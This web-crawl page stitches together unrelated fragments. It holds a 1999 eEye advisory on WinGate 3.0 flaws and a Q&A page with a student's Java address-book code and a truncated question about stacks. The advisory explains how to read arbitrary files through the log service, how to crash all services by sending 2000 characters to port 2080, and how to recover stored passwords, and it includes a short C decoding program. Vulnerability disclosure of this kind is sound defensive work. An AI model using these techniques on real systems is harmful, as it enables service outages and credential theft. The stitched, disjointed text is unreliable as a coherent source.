submitted and would be delivered to recipients shortly.
https://groups.yahoo.com/neo/groups/soaplite/conversations/topics/4715?o=1&source=1&var=1
CC-MAIN-2015-35
refinedweb
561
66.57
eeye.99-02-22.wingate ca0a59f19e16a49971833f0b3d1504f2 [INLINE] [INLINE] [INLINE] eEyelogosmall Home Hire News Alerts Articles Books Tools Links Contact Press [INLINE] [INLINE] [INLINE] eEye - Digital Security Team Alert Multiple WinGate Vulnerabilites Systems Affected WinGate 3.0 Release Date February 22, 1999 Advisory Code AD02221999 Description: WinGate 3.0 has three vulnerabilites. 1. Read any file on the remote system. 2. DoS the WinGate service. 3. Decrypt WinGate passwords. Read any file on the remote system We were debating if we should add this to the advisory or not. We figured it would not hurt so here it is. The WinGate Log File service in the past has had holes were you can read any file on the system and the holes still seem to be there and some new ways of doing it have cropped up. - NT/Win9x - NT/Win9x - Win9x Each of the above urls will list all files on the remote machine. There are a few reasons why we were not sure if we were going to post this information. By default all WinGate services are set so that only 127.0.0.1 can use the service. However the perpose is to let users remotely view the logs so therefore chances are people using the log file service are not going to be leaving it on 127.0.0.1. Also by default in the WinGate settings "Browse" is enabled. We are not sure if the developers intended the Browse option to mean the whole hard drive. We would hope not. The main reason we did put this in the advisory is the fact that the average person using WinGate (Cable Modem Users etc..) are not the brightest of people and they will open the Log Service so that everyone has access to it. We understand there are papers out there saying not to do this and even the program it self says not to, but the average person will not let this register in their head as a bad thing so the software should at least make it as secure as possible. Letting people read any file is not living to that standard. Anyways, lets move on... DoS the WinGate Service The Winsock Redirector Service sits on port 2080. When you connect to it and send 2000 characters and disconnect it will crash all WinGate services. O Yipee. Decrypt the WinGate passwords The registry keys where WinGate stores its passwords are insecure and let everyone read them. Therefore anyone can get the passwords and decrypt them. Code follows. // ChrisA@eEye.com // Mike@eEye.com #include "stdafx.h" #include <stdio.h> #include <string.h> main(int argc, char *argv[]) { char i; for(i = 0; i < strlen(argv[1]); i++) putchar(argv[1][i]^(char)((i + 1) << 1)); return 0; } You get the idea... It is good that WinGate 3.0 by default locks down all services to 127.0.0.1. However, there still seems to be holes were if one gets access to the WinGate service, non-blocked ip, they can do some damage. Chances are if you poke hard at some of the other services you will find similar problems as above. Vendor Status Contacted a month or so ago, have heard nothing. Someone from the NTSEC list contact eval-support@wingate.net with our findings and they were sent an email back rather quickly. We had sent our emails to support@wingate.net. Maybe all three of our emails just got lost. [INLINE] [LINK] [INLINE] Copyright © 1998-1999 eEye.com - All Rights Reserved. eEye is an Venture.
http://packetstormsecurity.org/files/19363/eeye.99-02-22.wingate.html
crawl-003
refinedweb
593
83.56
Hide Forgot Description of problem: Running SoundConverter failed to start due to this message "SoundConverter needs python-gstreamer 0.10!". It turned out gstreamer-ython is broken for Fedora 23. Version-Release number of selected component (if applicable): 0.10.22 How reproducible: Always on a freshly installed Fedora 23 Steps to Reproduce: 1. Start an application like SoundConverter 2. 3. Actual results: Application failed to start Expected results: Application should start Additional info: From the suggestion posted on, running python followed by import gst resulted to: $ python Python 2.7.10 (default, Sep 8 2015, 17:20:17) [GCC 5.1.1 20150618 (Red Hat 5.1.1-4)] on linux2 Type "help", "copyright", "credits" or "license" for more information. import gst Traceback (most recent call last): File "--RAW HTML NOT ALLOWED--", line 1, in --RAW HTML NOT ALLOWED-- File "/usr/lib64/python2.7/site-packages/gst-0.10/gst/init.py", line 193, in --RAW HTML NOT ALLOWED-- from _gst import * ImportError: /usr/lib64/python2.7/site-packages/gst-0.10/gst/_gst.so: undefined symbol: libxml_xmlDocPtrWrap The issues affected applications using gstreamer-python raising the severity to high. Downgrading gstreamer-python to F22 version allows application like SoundConverter running. Testing example below: $ sudo dnf downgrade gstreamer-python --releasever=22 Dependencies resolved. ================================================================================ Package Arch Version Repository Size ================================================================================ Downgrading: gstreamer-python x86_64 0.10.22-7.fc22 fedora 321 k Transaction Summary ================================================================================ Downgrade 1 Package Total download size: 321 k Is this ok [y/N]: y Downloading Packages: gstreamer-python-0.10.22-7.fc22.x86_64.rpm 22 kB/s | 321 kB 00:14 -------------------------------------------------------------------------------- Total 19 kB/s | 321 kB 00:17 Running transaction check Transaction check succeeded. Running transaction test Transaction test succeeded. Running transaction Downgrading : gstreamer-python-0.10.22-7.fc22.x86_64 1/2 Erasing : gstreamer-python-0.10.22-8.fc23.x86_64 2/2 Verifying : gstreamer-python-0.10.22-7.fc22.x86_64 1/2 Verifying : gstreamer-python-0.10.22-8.fc23.x86_64 2/2 Downgraded: gstreamer-python.x86_64 0.10.22-7.fc22 Complete! $ soundconverter SoundConverter 2.1.6 ** Message: pygobject_register_sinkfunc is deprecated (GstObject) using Gstreamer version: 0.10.36 using 4 thread(s) using gio "xingmux" gstreamer element not found, disabling Xing Header output. "lame" gstreamer element not found, disabling MP3 output. "faac" gstreamer element not found, disabling AAC output. Running python and import gst: $ python Python 2.7.10 (default, Sep 8 2015, 17:20:17) [GCC 5.1.1 20150618 (Red Hat 5.1.1-4)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import gst ** Message: pygobject_register_sinkfunc is deprecated (GstObject) Those above test demonstrate the current gstreamer-python is broken on F23. pbrobinson added a python-libxml2 dependency, but I still see these errors, on Rawhide: >>> import gst (gst-plugin-scanner:6850): GStreamer-WARNING **: Failed to load plugin '/usr/lib64/gstreamer-0.10/libgstpython.so': /usr/lib64/gstreamer-0.10/libgstpython.so: undefined symbol: PyList_Insert libGL error: failed to open drm device: Permission denied libGL error: failed to load driver: nouveau ** Message: pygobject_register_sinkfunc is deprecated (GstObject) the first in particular looks bad, I'll try and figure it out. hum, only seems to happen on the *first* try? not sure. weird. (In reply to awilliam@redhat.com from comment #3) > hum, only seems to happen on the *first* try? not sure. weird. Probably a remain of the old version waiting to flushed on the next try. =) Joking aside, I am closing this report now therecent version (0.10.22-9.fc23) including python-libxml2 dependency resolves the issue. Reproducible with F25. Also see bug 1367498. I don't know yet what else may be broken in soundconverter for a few releases of Fedora, but this is one problem. Oh, and a simple rebuild alone doesn't fix anything. soundconverter has a port to gstreamer 1.0 and python3 on upstream development branches, no releases yet though. As the previous package maintainer of soundconverter I'm aware of that. See my comments on @devel list where I've mentioned the old 3.0.0-alpha1 release ( ), whereas git is down to 2.9.0 something. I've also been active in upstream launchpad, and 3.0.0-alpha1 didn't work at all for me. Just making a package build is _not_ enough, and in the case of Soundconverter, much more work has been necessary for a long time. Spec %changelog tells parts of the story. I got a build of the current stuff which at least worked for my purposes (FLAC to Vorbis), but it didn't actually fix the unrelated bug I was trying to get fixed, so I didn't pursue it any further. not sure if I still have it. Strange to read something like that from you. Which "unrelated bug" is that? And did it affect Soundconverter as packaged by Fedora, too? well, yes, because that's what I was using. the bug was to do with soundconverter choking on files and/or metadata containing certain characters (like '). It could be that the "undefined symbol: PyList_Insert" is normal and only appears once during plugin registry update, because: $ rpm -q gstreamer-python ; rm -rf ~/.gstreamer-0.10/ ; gst-inspect-0.10 |head -1 gstreamer-python-0.10.22-11.fc25.x86_64 (gst-plugin-scanner:2175): GStreamer-WARNING **: Failed to load plugin '/usr/lib64/gstreamer-0.10/libgstpython.so': /usr/lib64/gstreamer-0.10/libgstpython.so: undefined symbol: PyList_Insert xvimagesink: xvimagesink: Video sink.
https://bugzilla.redhat.com/show_bug.cgi?id=1276442
CC-MAIN-2020-50
refinedweb
909
51.75
web commit by: Remove links and author reference This guide should allow you to learn how to create a new port or simply fix a port that you need. There are three target demographics listed below: - binary packages user with pkgin or pkg_add (you should be confident here) - build from source, use options (you will know this after reading the guide) - port developers (you should be able to get started here) ## pkgsrc tree You should have a copy of the pkgsrc tree sitting somewhere on your disk, already bootstrapped, see this [blog post]() on how to do this. The tree contains a `Makefile`, a `README`, distfiles, packages, category directories containing the ports, the bootstrap directory and some documentation. The `mk/*` directory contains the pkgsrc framework Makefiles but also shell and Awk scripts `pkglocate` is a script to find port names in the tree, though `pkgtools/pkgfind` is much faster. ## use the right tools If you want to get started working on ports like creating new ones or simply fix ones you need, you should know about these tools: - install package developer utilities: pkgin -y in pkg_developer It contains very useful programs like: - checkperms: verify file permissions - createbuildlink: create buildlink3.mk files, which I'll explain later - digest: create hashes for messages with crypto algorithms such as sha512 and many others - lintpkgsrc: checks the whole pkgsrc tree, list all explicitly broken packages for example - pkg_chk: checks package versions and update if necessary - pkg_tarup: create archives of installed programs for later use on other machines or backups - pkgdiff: show diffs of patched files - pkglint: verify the port you're creating for common mistakes (very useful!) - revbump: update package version by one bump by increasing PKGREVISION - url2pkg: create a blank port from the software download link, it saves you some time by filling out a few basic Makefile settings - verifypc: sanity check for pkg-config in ports ## port contents A pkgsrc port should at least contain: - `Makefile` : a comment, developer info, software download site and lots of other possibilities - `DESCR` : a paragraph containing the description for the software of the port we're making - `PLIST` : the list of files to install, pkgsrc will only install the files listed here to your prefix - `distinfo` : hashes of the software archive and patches or files in the port Here's how they would look like for a small port I submitted not long ago in pkgsrc-wip Makefile: [[!format make """ # [[!paste id=rcsid1]][[!paste id=rcsid2]] PKGNAME= osxinfo-0.1 CATEGORIES= misc GHCOMMIT= de74b8960f27844f7b264697d124411f81a1eab6 DISTNAME= ${GHCOMMIT} MASTER_SITES= MAINTAINER= youri.mout@gmail.com HOMEPAGE= COMMENT= Small Mac OS X Info Program LICENSE= isc ONLY_FOR_PLATFORM= Darwin-*-* DIST_SUBDIR= osxinfo WRKSRC= ${WRKDIR}/osxinfo-${GHCOMMIT} .include "../../databases/sqlite3/buildlink3.mk" .include "../../mk/bsd.pkg.mk" """]] DESCR: Small and fast Mac OS X info program written in C by Youri Mouton. PLIST: @comment [[!paste id=rcsid1]][[!paste id=rcsid2]] bin/osxinfo distinfo: [[!paste id=rcsid1]][[!paste id=rcsid2]] Size (osxinfo/de74b8960f27844f7b264697d124411f81a1eab6.tar.gz) = 5981 bytes ## make Now you know what kind of files you can see when you're in a port directory. The command used to compile it is the NetBSD `make` but often `bmake` on non NetBSD systems to avoid Makefile errors. Typing make alone will only compile the program but you can also use other command line arguments to make such as extract, patch, configure, install, package, ... I'll try to list them and explain them in logical order. You can run them together. - `make clean` will remove the source file from the work directory so you can restart with either new options, new patches, ... - `make fetch` will simply fetch the file and check if the hash corresponds. It will throw an error if it doesn't. - `make distinfo` or `make mdi` to update the file hashes in the `distinfo` file mentionned above. - `make extract` extracts the program source files from it's archive in the work directory - `make patch` applies the local pkgsrc patches to the source - `make configure` run the GNU configure script - `make` or `make build` or `make all` will stop after the program is compiled - `make stage-install` will install in the port destdir, where pkgsrc first installs program files to check if the files correspond with the `PLIST` contents before installing to your prefix. For `wget`, if you have a default WRKOBJDIR (I'll explain later), the program files will first be installed in `<path>/pkgsrc/net/wget/work/.destdir` then after a few checks, in your actual prefix like `/usr/pkg` - `make test` run package tests, if they have any - `make package` create a package without installing it, it will install dependencies though - `make replace` upgrade or reinstall the port if already installed - `make deinstall` deinstall the program - `make install` installs from the aforementionned `work/.destdir` to your prefix - `make bin-install` installs a package for the port, locally if previously built or remotely, as defined by BINPKG_SITES in `mk.conf`, you can make a port install dependencies from packages rather than building them with the DEPENDS_TARGET= bin-install in `mk.conf` - `make show-depends` show port dependencies - `make show-options` show various port options, as defined by `options.mk` - `make clean-depends` cleans all port dependencies - `make distclean` remove the source archive - `make package-clean` remove the package - `make distinfo` or `make mdi` to update the `distinfo` file containing file hashes if you have a new distfile or patch - `make print-PLIST` to generate a `PLIST` file from files found in `work/.destdir` You should be aware that there are many make options along with these targets, like - `PKG_DEBUG_LEVEL` - `CHECK_FILES` - and many others described the the NetBSD pkgsrc guide ## pkgsrc configuration The framework uses an `mk.conf` file, usually found in /etc. Here's how mine looks: [[!format make """ # Tue Oct 15 21:21:46 CEST 2013 .ifdef BSD_PKG_MK # begin pkgsrc settings DISTDIR= /pkgsrc/distfiles PACKAGES= /pkgsrc/packages WRKOBJDIR= /pkgsc/work ABI= 64 PKGSRC_COMPILER= clang CC= clang CXX= clang++ CPP= ${CC} -E PKG_DBDIR= /var/db/pkg LOCALBASE= /usr/pkg VARBASE= /var PKG_TOOLS_BIN= /usr/pkg/sbin PKGINFODIR= info PKGMANDIR= man BINPKG_SITES= DEPENDS_TARGET= bin-install X11_TYPE= modular TOOLS_PLATFORM.awk?= /usr/pkg/bin/nawk TOOLS_PLATFORM.sed?= /usr/pkg/bin/nbsed ALLOW_VULNERABLE_PACKAGES= yes MAKE_JOBS= 8 SKIP_LICENSE_CHECK= yes PKG_DEVELOPER= yes SIGN_PACKAGES= gpg PKG_DEFAULT_OPTIONS+= -pulseaudio -x264 -imlib2-amd64 -dconf .endif # end pkgsrc settings """]] - I use `DISTDIR`, `PACKAGES`, `WRKOBJDIR` to move distfiles, packages and source files somewhere else to keep my pkgsrc tree clean - `PKGSRC_COMPILER`, `CC`, `CXX`, `CPP` and `ABI` are my compiler options. I'm using clang to create 64 bit binaries here - `PKG_DBDIR`, `VARBASE`, `LOCALBASE`, `PKG_TOOLS_BIN` are my prefix and package database path and package tools settings - `PKGINFODIR`, `PKGMANDIR` are the info and man directories - `BINPKG_SITES` is the remote place where to get packages with the `bin-install` make target - `DEPENDS_TARGET` is the way port dependencies should be installed. `bin-install` will simply install a package instead of building the port - `X11_TYPE` sould be `native` or `modular`, the latter meaning we want X11 libraries from pkgsrc instead of using the `native` ones usually in `/usr/X11R7` in Linux or BSD systems and `/opt/X11` on Mac OS X with XQuartz - `TOOLS_PLATFORM.*` points to specific programs used by pkgsrc, here I use the one that was generated by pkgsrc bootstrap for maximum compatibility - `ALLOW_VULNERABLE_PACKAGES` allows you to disallow the installation of vulnerable packages in critical environments like servers - `MAKE_JOBS` the number of concurrent make jobs, I set it to 8 but it breaks some ports - `SKIP_LICENSE_CHECK` will skip the license check. If disabled you will have to define a list of licenses you find acceptable with `ACCEPTABLE_LICENSES` - `PKG_DEVELOPER` this option will show more details during the port building - `SIGN_PACKAGES` allows you to `gpg` sign packages. More info in my [blog post]() about it - `PKG_DEFAULT_OPTIONS` allows you to enable or disable specific options for all ports (as defined with ports' options.mk files), I disabled a few options so less ports would break, pulseaudio doesn't build on Mac OS X for example, neither do x264, dconf Keep in mind that there are many other available options documented in the official pkgsrc guide. ## creating a simple port Let's create a little port using the tools we've talked about above. I will use a little window manager called 2bwm. - We need an url for the program source files archive. It can be a direct link to a tar or xz archive. Mine's `` - Now that we have a proper link for our program source, create a directory for your port: $ mkdir ~/pkgsrc/wm/2bwm - Use `url2pkg` to create the needed files automatically: $ url2pkg You'll be presented with a text editor like `vim` to enter basic Makefile options: - `DISTNAME`, `CATEGORIES`, `MASTER_SITES` should be set automatically - enter your mail address for `MAINTAINER` so users know whom to contact if the port is broken - make sure the `HOMEPAGE` is set right, for 2bwm it is a github page - write a `COMMENT`, it should be a one-line description of the program - find out which license the program uses, in my case it is the `isc` license. You can find a list of licenses in `pkgsrc/mk/licenses.mk`. - Below you will see `.include "../../mk/bsd.pkg.mk"` at the end of the Makefile and above this should go the port's needed dependencies to build, we'll leave that empty at the moment and try to figure out what 2bwm needs - exit vim and it should fetch and update the file hashes for you. If it says `permission denied` you can just run `make mdi` to fetch and upadate the `distinfo` file So now you have valid `Makefile` and `distinfo` files but you need to write a paragraph in `DESCR`. You can usually find inspiration on the program's homepage. Here's how they look like at the moment: Makefile: [[ "../../mk/bsd.pkg.mk" """]] distinfo: [[!paste id=rcsid1]][[!paste id=rcsid2]] SHA1 (2bwm-0.1.tar.gz) = e83c862dc1d9aa198aae472eeca274e5d98df0ad RMD160 (2bwm-0.1.tar.gz) = d9a93a7d7ae7183f5921f9ad76abeb1401184ef9 Size (2bwm-0.1.tar.gz) = 38419 bytes DESCR:. But our PLIST file is still empty. #### build stage Let's try to build the port to see if things work but as soon as the build stage starts, we get this error: > 2bwm.c:26:10: fatal error: 'xcb/randr.h' file not found Let's find out which port provides this file ! $ pkgin se xcb returns these possible packages: xcb-util-wm-0.3.9nb1 Client and window-manager helpers for ICCCM and EWMH xcb-util-renderutil-0.3.8nb1 Convenience functions for the Render extension xcb-util-keysyms-0.3.9nb1 XCB Utilities xcb-util-image-0.3.9nb1 XCB port of Xlib's XImage and XShmImage xcb-util-0.3.9nb1 = XCB Utilities xcb-proto-1.9 = XCB protocol descriptions (in XML) xcb-2.4nb1 Extensible, multiple cut buffers for X Package content inspection allowed me to find the right port $ pkgin pc libxcb|grep randr.h So we can add the libxcb `buildlink3.mk` file to the Makefile above the bsd.pkg.mk include: .include "../../x11/libxcb/buildlink3.mk" This allows the port to link 2bwm against the libxcb port. Let's try to build the port again! $ make clean $ make Reports another error ! > 2bwm.c:27:10: fatal error: 'xcb/xcb_keysyms.h' file not found It looks like this file is provided by xcb-util-keysyms, so let's add: .include "../../x11/xcb-util-keysyms/buildlink3.mk" in our Makefile. Clean, build again, and add more dependencies until it passes the build stage. Here's how my Makefile ends up looking like: [[ "../../x11/libxcb/buildlink3.mk" .include "../../x11/xcb-util-wm/buildlink3.mk" .include "../../x11/xcb-util-keysyms/buildlink3.mk" .include "../../x11/xcb-util/buildlink3.mk" .include "../../mk/bsd.pkg.mk" """]] #### install phase Geat ! We got our program to compile in pkgsrc. Now we must generate the PLIST file so we can actually install the program, but we must `make stage-install` to make sure that it installs in the right place. $ find /pkgsrc/work/wm/2bwm/work/.destdir/ returns: /pkgsrc/work/wm/2bwm/work/.destdir/ /pkgsrc/work/wm/2bwm/work/.destdir//usr /pkgsrc/work/wm/2bwm/work/.destdir//usr/local /pkgsrc/work/wm/2bwm/work/.destdir//usr/local/bin /pkgsrc/work/wm/2bwm/work/.destdir//usr/local/bin/2bwm /pkgsrc/work/wm/2bwm/work/.destdir//usr/local/bin/hidden /pkgsrc/work/wm/2bwm/work/.destdir//usr/local/share /pkgsrc/work/wm/2bwm/work/.destdir//usr/local/share/man /pkgsrc/work/wm/2bwm/work/.destdir//usr/local/share/man/man1 /pkgsrc/work/wm/2bwm/work/.destdir//usr/local/share/man/man1/2bwm.1 /pkgsrc/work/wm/2bwm/work/.destdir//usr/local/share/man/man1/hidden.1 /pkgsrc/work/wm/2bwm/work/.destdir//usr/pkg This doesn't look right since our `LOCALBASE` is `/usr/pkg`. $ make print-PLIST returns nothing, because 2bwm installs files in the wrong place so we need to fix 2bwm's own Makefile to use the right `DESTDIR` and `PREFIX`, that is set to the right place by pkgsrc. Let's inspect how 2bwm installs: From 2bwm's Makefile: [[!format make """ install: $(TARGETS) test -d $(DESTDIR)$(PREFIX)/bin || mkdir -p $(DESTDIR)$(PREFIX)/bin install -pm 755 2bwm $(DESTDIR)$(PREFIX)/bin install -pm 755 hidden $(DESTDIR)$(PREFIX)/bin test -d $(DESTDIR)$(MANPREFIX)/man1 || mkdir -p $(DESTDIR)$(MANPREFIX)/man1 install -pm 644 2bwm.man $(DESTDIR)$(MANPREFIX)/man1/2bwm.1 install -pm 644 hidden.man $(DESTDIR)$(MANPREFIX)/man1/hidden.1 """]] This looks fine since it installs in a `DESTDIR`/`PREFIX` but it sets > PREFIX=/usr/local and > MANPREFIX=$(PREFIX)/share/man In the beginning of the Makefile. We should remove the first line and edit the man prefix: > MANPREFIX=${PKGMANDIR} so pkgsrc can install the program's files in the right place. We have two ways of modifying this file, either patch the Makefile or use `sed` substitution which is a builtin pkgsrc feature that allows you to change lines in files with a sed command before building the port. I will show how to do both ways so you can get an introduction on how to generate patch files for pkgsrc. #### patching the Makefile : - edit the file you need to modify with `pkgvi`: $ pkgvi /pkgsrc/work/wm/2bwm/work/2bwm-0.1/Makefile which should return: > pkgvi: File was modified. For a diff, type: pkgdiff "/Volumes/Backup/pkgsrc/work/wm/2bwm/work/2bwm-0.1/Makefile" and this returns our diff. - create the patch with `mkpatches`, it should create a `patches` directory in the port containing the patch and an original file removed with `mkpatches -c`. $ find patches/* patches/patch-Makefile - now that the patch has been created, we need to add it's hash to distinfo otherwise pkgsrc won't pick it up: $ make mdi you should get this new line: > SHA1 (patch-Makefile) = 9f8cd00a37edbd3e4f65915aa666ebd0f3c04e04 - you can now clean and `make patch` and `make stage-install CHECK_FILES=no` since we still haven't generated a proper PLIST. Let's see if 2wm files were installed in the right place this time: $ find /pkgsrc/work/wm/2bwm/work/.destdir/ /pkgsrc/work/wm/2bwm/work/.destdir/ /pkgsrc/work/wm/2bwm/work/.destdir//usr /pkgsrc/work/wm/2bwm/work/.destdir//usr/pkg /pkgsrc/work/wm/2bwm/work/.destdir//usr/pkg/bin /pkgsrc/work/wm/2bwm/work/.destdir//usr/pkg/bin/2bwm /pkgsrc/work/wm/2bwm/work/.destdir//usr/pkg/bin/hidden It looks like it is alright ! Let's generate the PLIST: $ make print-PLIST > PLIST containing: @comment [[!paste id=rcsid1]][[!paste id=rcsid2]] bin/2bwm bin/hidden There you have a working port you can install normally with $ make install #### using the sed substitution framework You should be able to fix the prefix error much quicker than with the patching explained above thanks to the sed substitution framework. Here's how it looks like in my port Makefile: [[!format make """ SUBST_CLASSES+= makefile SUBST_STAGE.makefile= pre-build SUBST_MESSAGE.makefile= Fixing makefile SUBST_FILES.makefile= Makefile SUBST_SED.makefile= -e 's,/usr/local,${PREFIX},g' SUBST_SED.makefile+= -e 's,share/man,${PKGMANDIR},g' """]] As you can see, you can do multiple commands on multiple files, it is very useful for very small fixes like this. #### pkglint Now that we have a working port, we must make sure it complies to the pkgsrc rules. $ pkglint Returns ERROR: DESCR:4: File must end with a newline. ERROR: patches/patch-Makefile:3: Comment expected. 2 errors and 0 warnings found. (Use -e for more details.) Fix the things pkglint tells you to do until you get the glorious: > looks fine. Then you should do some testing on the program itelf on at least two platforms such as NetBSD, Mac OS X. Other platforms supported by pkgsrc can be found at [pkgsrc.org](). If you would like to submit your pkgsrc upstream you can either subscribe to pkgsrc-wip or ask a NetBSD developer to add it for you. You can find the 2bwm port I submitted in [pkgsrc-wip](). ## pkgsrc and wip If you want to submit your port for others to use you can either subscribe to pkgsrc-wip or ask a NetBSD developer to add it for you which can be tough. Even though there are many IRC channels in which you can find nice developers, you will have to take the time to get to know them. The easiest way for beginners is to submit to pkgsrc-wip so other people can review and test it first. pkgsrc-wip is hosted on [sourceforge]() and you can easily get cvs access to it if you create an account on there and send an email to NetBSD developer `@wiz` (Thomas Klausner) asking nicely for commit access. I got access fairly quickly and he even fixed a port to show me how to do it properly. You can also send me an email or talk to me on IRC so I can submit it for you. ## the options framework You can create port options with the `options.mk` file, like for `wm/dwm` [[!format make """ # [[!paste id=rcsid1]][[!paste id=rcsid2]] PKG_OPTIONS_VAR= PKG_OPTIONS.dwm PKG_SUPPORTED_OPTIONS= xinerama PKG_SUGGESTED_OPTIONS= xinerama .include "../../mk/bsd.options.mk" # # Xinerama support # # If we don't want the Xinerama support we delete XINERAMALIBS and # XINERAMAFLAGS lines, otherwise the Xinerama support is the default. # .if !empty(PKG_OPTIONS:Mxinerama) . include "../../x11/libXinerama/buildlink3.mk" .else SUBST_CLASSES+= options SUBST_STAGE.options= pre-build SUBST_MESSAGE.options= Toggle the Xinerama support SUBST_FILES.options= config.mk SUBST_SED.options+= -e '/^XINERAMA/d' . include "../../x11/libX11/buildlink3.mk" .endif """]] This file should be included in the Makefile: .include "options.mk" If you type `make show-options`, you should see this: Any of the following general options may be selected: xinerama Enable Xinerama support. These options are enabled by default: xinerama These options are currently enabled: xinerama You can select which build options to use by setting PKG_DEFAULT_OPTIONS or PKG_OPTIONS.dwm. Running `make PKG_OPTIONS=""` should build without the `xinerama` dwm option enabled by default. The options.mk file must contain these variables: - `PKG_OPTIONS_VAR` sets the options variable name - `PKG_SUPPORTED_OPTIONS` lists all available options - `PKG_SUGGESTED_OPTIONS` lists options enabled by default It allows you to change configure arguments and include other buildlinks, and various other settings. ## hosting a package repo Now that you've created a few ports, you might want to make precompiled packages available for testing. You will need pkgsrc's `pkg_install` on the host system. I host my [packages]() on a FreeBSD server with a bootstrapped pkgsrc. I use this `zsh` function to : [[!format make """ add () { # upload the package to remote server scp $1 yrmt@saveosx.org:/usr/local/www/saveosx/packages/Darwin/2013Q4/x86_64/All/ 2> /dev/null # update the package summary ssh yrmt@saveosx.org 'cd /usr/local/www/saveosx/packages/Darwin/2013Q4/x86_64/All/; rm pkg_summary.gz; /usr/pkg/sbin/pkg_info -X *.tgz | gzip -9 > pkg_summary.gz' # pkgin update sudo pkgin update } """]] - upload a package - update the package summary, which is an archive containing information about all present packages that will be picked up by pkg_install and pkgin. It looks like this for one package: PKGNAME=osxinfo-0.1 DEPENDS=sqlite3>=3.7.16.2nb1 COMMENT=Small Mac OS X Info Program SIZE_PKG=23952 BUILD_DATE=2014-06-29 12:45:08 +0200 CATEGORIES=misc HOMEPAGE= LICENSE=isc MACHINE_ARCH=x86_64 OPSYS=Darwin OS_VERSION=14.0.0 PKGPATH=wip/osxinfo PKGTOOLS_VERSION=20091115 REQUIRES=/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation REQUIRES=/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation REQUIRES=/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit REQUIRES=/usr/lib/libSystem.B.dylib REQUIRES=/usr/pkg/lib/libsqlite3.0.dylib FILE_NAME=osxinfo-0.1.tgz FILE_SIZE=9710 DESCRIPTION=Small and fast Mac OS X info program written in C DESCRIPTION=by Youri Mouton. DESCRIPTION= DESCRIPTION=Homepage: DESCRIPTION= - update pkgin And this shell alias to upload all my built packages, but I still need to run `add()` mentionned above to update the pkg_summary [[!format bash """ up='rsync -avhz --progress /pkgsrc/packages/ root@saveosx.org:/usr/local/www/saveosx/packages/Darwin/2013Q4/x86_64/' """]] Then you should be able to set the url in repositories.conf to use your packages with pkgin. You can also install them directly with something like `pkg_add` of course. ## build all packages Bulk building pkgsrc packages is a topic for another post, see jperkin's excellent blog [posts]() about this. ## faq #### what if the port I'm making is a dependency for another one? You should just generate the buildlink3.mk file we've talked about earlier like this: $ createbuildlink > buildlink3.mk #### what if the program is only hosted on GitHub ? pkgsrc supports fetching archives from specific git commits on GitHub like this: [[!format make """ PKGNAME= 2bwm-0.1 CATEGORIES= wm GHCOMMIT= 52a097ca644eb571b22a135951c945fcca57a25c DISTNAME= ${GHCOMMIT} MASTER_SITES= DIST_SUBDIR= 2bwm WRKSRC= ${WRKDIR}/2bwm-${GHCOMMIT} """]] You can then easily update the git commit and the distinfo with it to update the program. #### what if the program doesn't have a Makefile You can do all Makefile operations directly from the port's Makefile like this: [[!format make """ post-extract: ${CHMOD} a-x ${WRKSRC}/elementary/apps/48/internet-mail.svg do-install: ${INSTALL_DATA_DIR} ${DESTDIR}${PREFIX}/share/icons cd ${WRKSRC} && pax -rw -pe . ${DESTDIR}${PREFIX}/share/icons/ """]] To install, but you can also build programs from the Makefile. This is what qt4-sqlite3 uses: [[!format make """ do-build: cd ${WRKSRC}/src/tools/bootstrap && env ${MAKE_ENV} ${GMAKE} cd ${WRKSRC}/src/tools/moc && env ${MAKE_ENV} ${GMAKE} cd ${WRKSRC}/src/plugins/sqldrivers/sqlite && env ${MAKE_ENV} ${GMAKE} """]] You can install the following type of files: `INSTALLATION_DIRS` : A list of directories relative to PREFIX that are created by pkgsrc at the beginning of the install phase. The package is supposed to create all needed directories itself before installing files to it and list all other directories here. #### common errors - > Makefile:19: *** missing separator. Stop. This means you're not using the right `make`. On most systems, the make installed from the pkgsrc bootstrap is called `bmake` - If you have a feeling a port is stuck in the building stage, disable make jobs in your mk.conf [[!cut id=rcsid1 text="$Net"]] [[!cut id=rcsid2 text="BSD$"]] [[!meta title="An introduction to packaging"]] [[!meta author="Youri Mouton"]]
https://wiki.netbsd.org/cgi-bin/cvsweb/wikisrc/pkgsrc/intro_to_packaging.mdwn?rev=1.5;content-type=text%2Fx-cvsweb-markup;sortby=log;f=h
CC-MAIN-2022-40
refinedweb
3,839
53.41
Computer Science Archive: Questions from November 29, 2008 - Anonymous askedSir I upgrade my system and install again JAVA jdk1.6.0_07 and setall environments... but now I have... Show moreSir I upgrade my system and install again JAVA jdk1.6.0_07 and setall environments... but now I have face some errors likebelow: Note: AddressBok.java uses unchecked or unsafe operations. Note: Recompile with -Xlint:unchecked details. CODE IS AS UNDER: ------------------------------------------------ import java.util.*; import javax.swing.*; public class AddressBok{ // declare variables ArrayList persons; // call the constructotr public AddressBok(){ persons = new ArrayList(); } // add funtion for data add into array list public void addPerson(){ // Get Input data from user through dialog boxGUI String name =JOptionPane.showInputDialog(" Enter the person Name... "); String address =JOptionPane.showInputDialog(" Enter the Address of person..."); String phone =JOptionPane.showInputDialog(" Enter Phonenumber.... "); /* than make a person class Object gives allabove values this is the one person data.....all person data in the array list above persons we r uding personalInfo class*/ PersonalInfo p = new PersonalInfo(name, address,phone); /* now we make one person data information getinput from user through JOptionPane dialogbox andmake a Object of that data related to one person now add object into arraylist.... */ persons.add(p); } // search function passing a name throughserial/sequentially one by one public void SearchPerson(String n){ for (int i = 0;i<persons.size(); i++){ // get the object frompersons array list // type cast into orignal andstore its refference into p PersonalInfo p =(PersonalInfo) persons.get(i); if(n.equals(p.name)){ p.PrintPersonInfo(); } else{ JOptionPane.showMessageDialog(null," NO name wasfound...."); } } } public void DeletePerson(String n){ for(int i = 0; i<persons.size(); i++){ // get the object frompersons array list // type cast into orignal andstore its refference into p PersonalInfo p =(PersonalInfo) persons.get(i); if(n.equals(p.name)){ persons.remove(i); } } } } ------------------------------------------------- main class code is under -------------------------------------------------- import javax.swing.*; public class PersonalInfo{ private String name; private String address; private String phone; public PersonalInfo(String n, String ad, String ph){ name = n; address = ad; phone = ph; } // Print on dialog box GUI Result public void PrintPersonInfo(){ JOptionPane.showMessageDialog(null," Name...[ "+name+ " Address...[ "+address+" Phone Number...[ "+phone); } } • Show less0 answers - Anonymous askedprimary memory... Show moreConsider implementing a stack in a computer that has a relativelysmall amount of fast primary memory and a relatively large amount of slower 